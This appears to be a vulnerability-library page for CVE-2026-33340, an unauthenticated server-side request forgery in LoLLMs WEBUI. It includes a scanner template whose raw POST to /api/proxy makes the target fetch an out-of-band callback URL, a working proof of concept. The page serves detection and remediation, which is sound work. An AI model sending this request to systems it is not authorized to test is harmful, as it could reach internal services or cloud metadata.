/Vulnerability Library

LoLLMs WEBUI - Server-Side Request Forgery

CVE-2026-33340
Verified

Description

LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.

Severity

Critical

CVSS Score

9.1

Exploit Probability

16%

Published Date

April 9, 2026

Template Author

theamanrawat

CVE-2026-33340.yaml
id: CVE-2026-33340

info:
  name: LoLLMs WEBUI - Server-Side Request Forgery
  author: theamanrawat
  severity: critical
  description: |
    LoLLMs WEBUI contains a server-side request forgery caused by unauthenticated access to the /api/proxy endpoint, letting attackers force the server to make arbitrary GET requests, exploit requires no authentication.
  impact: |
    Attackers can access internal services, scan local networks, or exfiltrate sensitive cloud metadata, potentially leading to data exposure and further compromise.
  remediation: |
    Update to a patched version once available or apply mitigations to restrict server-side requests.
  reference:
    - https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4
    - https://nvd.nist.gov/vuln/detail/CVE-2026-33340
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-33340
    epss-score: 0.16263
    epss-percentile: 0.94838
    cwe-id: CWE-306
  metadata:
    max-requests: 1
    verified: true
  tags: cve,cve2026,lollms,ssrf

http:
  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url": "http://{{interactsh-url}}"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "http")'
          - 'contains(body, "{\"content\":\"")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100bbd5518fdfae60c3d0d90c453f6c6dccc49cd0c85d35cf2f4ef33ad151b17dcb0220305e01de145b91d28766fd42227a94fa81aff2eba96820c348503c502c0d9638:922c64590222798bb761d5b6d8e72950
9.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2026-33340
CWE ID:
cwe-306

References

https://github.com/ParisNeo/lollms-webui/security/advisories/GHSA-mcwr-5469-pxj4https://nvd.nist.gov/vuln/detail/CVE-2026-33340

Remediation Steps

Update to a patched version once available or apply mitigations to restrict server-side requests.